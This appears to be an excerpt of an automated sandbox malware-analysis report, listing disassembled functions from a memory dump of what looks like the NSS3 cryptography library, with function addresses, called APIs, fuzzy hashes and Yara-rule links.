Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Alloc_free$Strdup_
String ID:
API String ID: 1542459429-0
Opcode ID: d1548dc189c4296ed74e0323b195db3f127780aab29a2d5668d3f0e65753f154
Instruction ID: afbfff2bcc435d6efdcf1825ad1963a5d6bc23926f455107f55ca2ef4b39ff61
Opcode Fuzzy Hash: d1548dc189c4296ed74e0323b195db3f127780aab29a2d5668d3f0e65753f154
Instruction Fuzzy Hash: B1315A5A6096C44EE7020B399EA53F72F964B4716CF1E0078ECD6C7B02D203A00D9791

Function 6C802460 Relevance: 7.6, APIs: 5, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,6C8A7379,00000002,?), ref: 6C802493
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C8024B4
PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6C8A7379,00000002,?), ref: 6C8024EA
PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6C8A7379,00000002,?), ref: 6C8024F5
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6C8A7379,00000002,?), ref: 6C8024FE

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$Alloc_FreeK11_Utilfree
String ID:
API String ID: 2595244113-0
Opcode ID: eb961b0c374086ce7028eb4398527f8b8176338750fedb56c5b3059d94cecd41
Instruction ID: c2cb612006aac594e5313b2768b2c1b2e80df43374e8618bb8e63e7e5e8e758c
Opcode Fuzzy Hash: eb961b0c374086ce7028eb4398527f8b8176338750fedb56c5b3059d94cecd41
Instruction Fuzzy Hash: 453104B1B00116ABEB208FA4DD49BBF77A4EF48308F104525FD1496A80E778D954C7E1

Function 6C808530 Relevance: 7.6, APIs: 5, Instructions: 103COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6C808549
TlsGetValue.KERNEL32 ref: 6C8085CF
TlsGetValue.KERNEL32 ref: 6C8085FE
TlsGetValue.KERNEL32 ref: 6C808629
memcpy.VCRUNTIME140 ref: 6C808655

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$IdentitiesLayermemcpy
String ID:
API String ID: 2311246771-0
Opcode ID: 757d0f79c4c40cd57fcf80a77fc373be42592a01c9c0f0776dc527d011369082
Instruction ID: ebbf49a5e183a354f292c7e914152560971b5a17de2a0885342736cdd23309af
Opcode Fuzzy Hash: 757d0f79c4c40cd57fcf80a77fc373be42592a01c9c0f0776dc527d011369082
Instruction Fuzzy Hash: 8A4160707056058FEB20AF79DA4865AB7B4BF45308F128A3AD8A847A51DB309CD4CB86

Function 6C76EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C76EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C76EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C76EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C76EEEB
free.MOZGLUE(?), ref: 6C76EEF6

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: e1d3a500d944eea0cbc5740427aaea387d59980630367e3f7d82b79b7f906c93
Instruction ID: 119bc0370f1be7aba77b4c4b7939fd09dfbc994d042f511e9bb8f30b8b63665e
Opcode Fuzzy Hash: e1d3a500d944eea0cbc5740427aaea387d59980630367e3f7d82b79b7f906c93
Instruction Fuzzy Hash: D531E4B1A006059BEB209F2ACD44B667BB8FB46318F140539EC5A87E51D731E914CBE1

Function 6C88A530 Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C88A55C
PR_IntervalNow.NSS3 ref: 6C88A573
PR_IntervalNow.NSS3 ref: 6C88A5A5
_PR_MD_UNLOCK.NSS3(?), ref: 6C88A603

Part of subcall function 6C839890: TlsGetValue.KERNEL32(?,?,?,6C8397EB), ref: 6C83989E

_PR_MD_UNLOCK.NSS3(?), ref: 6C88A636

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Interval$CriticalEnterSectionValue
String ID:
API String ID: 959321092-0
Opcode ID: 60ab05b7ec14df5256f6cb4b9f672be7e41e9a17aa802d0ca63fb6b45122d990
Instruction ID: 87e7d0e767a5b7ae499e11ee6f481dd2cbd1733055e2ab65743b7367a2639609
Opcode Fuzzy Hash: 60ab05b7ec14df5256f6cb4b9f672be7e41e9a17aa802d0ca63fb6b45122d990
Instruction Fuzzy Hash: CA3150B16022158FCB20DFA9C68069AB7B5BF44319B158975D8189BFD6E730EC84CFD0

Function 6C7986D0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C798716
TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C798727
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C79873B
PR_Unlock.NSS3(?), ref: 6C79876F
PR_SetError.NSS3(00000000,00000000), ref: 6C798787

Part of subcall function 6C7979F0: memcpy.VCRUNTIME140(?,6C89AB28,000000FC), ref: 6C797A1E
Part of subcall function 6C7979F0: PR_SetError.NSS3(FFFFE001,00000000), ref: 6C797A48

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$AuthenticateCriticalEnterK11_SectionUnlockValuememcpy
String ID:
API String ID: 3710639568-0
Opcode ID: f5b756817519979309b423836c0e193e4bb7c0eb54516e239c66a7beec6cbcf2
Instruction ID: 906884a9700432306af40359587a1f0fb15177e99c228c55fc22dfab30772c66
Opcode Fuzzy Hash: f5b756817519979309b423836c0e193e4bb7c0eb54516e239c66a7beec6cbcf2
Instruction Fuzzy Hash: 39314976A00200ABDF109F78ED45E9A77B9EF45318F154035FD099BB12EB31E904C791

Function 6C7744D0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3 ref: 6C7744FF

Part of subcall function 6C7D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C778298,?,?,?,6C76FCE5,?), ref: 6C7D07BF
Part of subcall function 6C7D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7D07E6
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D081B
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D0825

SECOID_FindOID_Util.NSS3(?), ref: 6C774524
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C774537
CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6C774579

Part of subcall function 6C7741B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C7741BE
Part of subcall function 6C7741B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7741E9
Part of subcall function 6C7741B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C774227
Part of subcall function 6C7741B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6C77423D

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C77459C

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
String ID:
API String ID: 3193526912-0
Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction ID: 818dbf27bb43d7c671f38d727b053079f9fbbe23e76990981c0bf6312134acd2
Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction Fuzzy Hash: 7B21A1717056189BEF30CA699E48B7B37A89F4175CF250838AC158BA41E721E904EEB1

Function 6C77A6B0 Relevance: 7.6, APIs: 5, Instructions: 90timeCOMMON

Download Yara Rule

APIs

CERT_CheckCertValidTimes.NSS3(00000000,00000000,6C77A2FA,00000000,6C77A2FA,00000000), ref: 6C77A6E4

Part of subcall function 6C771DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C771E0B
Part of subcall function 6C771DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C771E24

TlsGetValue.KERNEL32(?,?,?,?,6C77A2FA,00000000), ref: 6C77A723
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C77A2FA,00000000), ref: 6C77A733
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C77A2FA,00000000), ref: 6C77A74C
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,6C77A2FA,00000000), ref: 6C77A774

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Choice_DecodeTime$Arena_CertCheckCriticalEnterFreeSectionTimesUnlockValidValue
String ID:
API String ID: 2353111112-0
Opcode ID: 6db97a2423bdb241dc0249b00b264dbbe187797c1331d58955b28d130e96d8bb
Instruction ID: 257212fb5438e499b70afd1ab90ee94db2436b6f351ea61a86937df3882d8034
Opcode Fuzzy Hash: 6db97a2423bdb241dc0249b00b264dbbe187797c1331d58955b28d130e96d8bb
Instruction Fuzzy Hash: 8E21D175A006089BFF309E398E4576677B89F4A278F104439EC2887B41EB34E944C6F2

Function 6C77E5E0 Relevance: 7.6, APIs: 5, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,00000000,00000000,?,6C77E755,00000000,00000004,?,?), ref: 6C77E5F5

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PR_SetError.NSS3(FFFFE005,00000000,?), ref: 6C77E62C
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000,?), ref: 6C77E63E

Part of subcall function 6C7CF9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6C76F379,?,00000000,-00000002), ref: 6C7CF9B7

PK11_HashBuf.NSS3(?,?,?,?,?,?,?,?), ref: 6C77E65C

Part of subcall function 6C79DDD0: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C79DDEC
Part of subcall function 6C79DDD0: PK11_DigestBegin.NSS3(00000000), ref: 6C79DE70
Part of subcall function 6C79DDD0: PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C79DE83
Part of subcall function 6C79DDD0: HASH_ResultLenByOidTag.NSS3(?), ref: 6C79DE95
Part of subcall function 6C79DDD0: PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C79DEAE
Part of subcall function 6C79DDD0: PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C79DEBB

SECITEM_ZfreeItem_Util.NSS3(00000000,00000000,?), ref: 6C77E68E

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_Util$Digest$ArenaItem_Mark_$AllocBeginContextCriticalDestroyEnterErrorFinalFindHashResultSectionTag_UnlockValueZfree
String ID:
API String ID: 2865137721-0
Opcode ID: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
Instruction ID: 52a6fee3ba8619626b573a92a72c277270fc45d9bc327e11579c8b937b9a3dba
Opcode Fuzzy Hash: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
Instruction Fuzzy Hash: A821347670220D6FFF204EA59E48EAA77989F80658F154138ED19CBA51EB21DD24C3E1

Function 6C77AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C773FFF,00000000,?,?,?,?,?,6C771A1C,00000000,00000000), ref: 6C77ADA7

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C773FFF,00000000,?,?,?,?,?,6C771A1C,00000000,00000000), ref: 6C77ADB4

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C773FFF,?,?,?,?,6C773FFF,00000000,?,?,?,?,?,6C771A1C,00000000), ref: 6C77ADD5

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C8994B0,?,?,?,?,?,?,?,?,6C773FFF,00000000,?), ref: 6C77ADEC

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C773FFF), ref: 6C77AE3C

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 47eccb3f2b567cbcd8721cd52df6bc351038d912c4a453418890b243cf9afe7e
Instruction ID: 08f92fd602adab4699a702c689c7bc82745d90bd8108ce6f4f550c5f9e486f45
Opcode Fuzzy Hash: 47eccb3f2b567cbcd8721cd52df6bc351038d912c4a453418890b243cf9afe7e
Instruction Fuzzy Hash: 45112961E002095BFB209B699E49BBF73BCDF9126DF044638EC1996741F760E55882F2

Function 6C7D26A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

_NSSUTIL_GetSecmodName.NSS3(?,?,?,?,?), ref: 6C7D26DD

Part of subcall function 6C7D5DE0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C7D5E08
Part of subcall function 6C7D5DE0: NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C7D5E3F
Part of subcall function 6C7D5DE0: PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C7D5E5C
Part of subcall function 6C7D5DE0: free.MOZGLUE(00000000), ref: 6C7D5E7E
Part of subcall function 6C7D5DE0: free.MOZGLUE(00000000), ref: 6C7D5E97
Part of subcall function 6C7D5DE0: PORT_Strdup_Util.NSS3(secmod.db), ref: 6C7D5EA5
Part of subcall function 6C7D5DE0: _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C7D5EBB
Part of subcall function 6C7D5DE0: NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C7D5ECB
Part of subcall function 6C7D5DE0: PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C7D5EF0

PR_SetError.NSS3(FFFFE0B1,00000000), ref: 6C7D26F8

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

free.MOZGLUE(00000000), ref: 6C7D3434
free.MOZGLUE(?), ref: 6C7D3448
free.MOZGLUE(?), ref: 6C7D345C

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$Value$L_strncasecmpParam$ConfigErrorEvaluateNameSecmodStrdup_Utilisspace
String ID:
API String ID: 3127463018-0
Opcode ID: 321e9e503c35deb589d5347950ac95c75afbe317aee63729266cc89eb172c482
Instruction ID: 011bcf7a267760d013d3a66c666fdc1c27a0f32d1203e71fdf2b3c2067ed1308
Opcode Fuzzy Hash: 321e9e503c35deb589d5347950ac95c75afbe317aee63729266cc89eb172c482
Instruction Fuzzy Hash: 0F113AF1A001188BDF20DF68DC85AEA73B8FF01354F058478E85997640EB31EA04CBE1

Function 6C8004C0 Relevance: 7.6, APIs: 5, Instructions: 63synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C80461B,-00000004), ref: 6C8004DF
TlsGetValue.KERNEL32(?,00000000,?,6C80461B,-00000004), ref: 6C800510
EnterCriticalSection.KERNEL32(ED850FDC), ref: 6C800520
PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C80461B,-00000004), ref: 6C800534
GetLastError.KERNEL32(?,6C80461B,-00000004), ref: 6C800543

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
String ID:
API String ID: 3052423345-0
Opcode ID: bf1a57ca882f8aede992c00b0e326e76b1c76493bd715abb4a441c68a65e75d8
Instruction ID: ac038c531e82f371203329fb910db4c0ef2b2c8adf543cd3c8383cf1696a3e3d
Opcode Fuzzy Hash: bf1a57ca882f8aede992c00b0e326e76b1c76493bd715abb4a441c68a65e75d8
Instruction Fuzzy Hash: AA11E771F041455BDB306F389E09B6536A4AF0231DF644E35E825E7D91EB31D644CB91

Function 6C788FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C790710), ref: 6C788FF1
PR_CallOnce.NSS3(6C8D2158,6C789150,00000000,?,?,?,6C789138,?,6C790710), ref: 6C789029
calloc.MOZGLUE(00000001,00000000,?,?,6C790710), ref: 6C78904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C790710), ref: 6C789066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C790710), ref: 6C789078

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: e69ea5feec6dbdce7786d1660c73eaf1a22a65413828616124cf503df5813993
Instruction ID: 606fe7c61a95441a5e77fe17d33b6a3955d830e054bedd5ca446358ae8328f41
Opcode Fuzzy Hash: e69ea5feec6dbdce7786d1660c73eaf1a22a65413828616124cf503df5813993
Instruction Fuzzy Hash: AF11442170221267EB201AADAE04A6A72ACEB927ADF400431FE48D2F40F753CD45C3E1

Function 6C772750 Relevance: 7.6, APIs: 5, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,00000000,00000000,?,?,6C7DCBA2,00000000,00000000), ref: 6C772765
